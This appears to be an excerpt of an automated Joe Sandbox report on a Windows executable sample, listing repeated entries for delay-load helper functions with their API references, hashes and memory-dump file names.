                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 8bde87d5862c93909256ea3be3d3684820a7f88fd71cac1429c4846260b4d0a0
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 8bde87d5862c93909256ea3be3d3684820a7f88fd71cac1429c4846260b4d0a0
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 21a997e2217d1b91470d6fda6d7359d389f40d758be202071dda3a067593b01d
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 21a997e2217d1b91470d6fda6d7359d389f40d758be202071dda3a067593b01d
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: e6b4e6fbce2c457fa07669edb88b4d1f5fdf1219fcb3cae66e16145d58eb49b0
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: e6b4e6fbce2c457fa07669edb88b4d1f5fdf1219fcb3cae66e16145d58eb49b0
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 788e1ba66639ce0c30fde5584c882119102856639f9bb106482a07359c87b3e3
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 788e1ba66639ce0c30fde5584c882119102856639f9bb106482a07359c87b3e3
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 1aa98988455b874d01db13866ab361e8a59451cd523f6e9cb6c3077a5d151690
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 1aa98988455b874d01db13866ab361e8a59451cd523f6e9cb6c3077a5d151690
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 79d0162f60d01523533d7270e2810ff23956f8f38de4cfb45952fd5111559b4b
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 79d0162f60d01523533d7270e2810ff23956f8f38de4cfb45952fd5111559b4b
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                Function 00D7DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                Function 00D7DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                Function 00D7DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                Function 00D7DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                Function 00D7DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                                • Instruction ID: c86d836922df9aefbc7272a78cf5fb7050dc04edf516b90c24bd539397434eb7
                                • Opcode Fuzzy Hash: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                                • Instruction Fuzzy Hash: 3FA001A62AD5427C3648B252BE17D3A626EEDE0B22331C61FF44FA4089B99898495871
                                Function 00D7DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                Function 00D7DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                                • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                                • Opcode Fuzzy Hash: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                                • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
                                Function 00D7DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                                • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                                • Opcode Fuzzy Hash: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                                • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
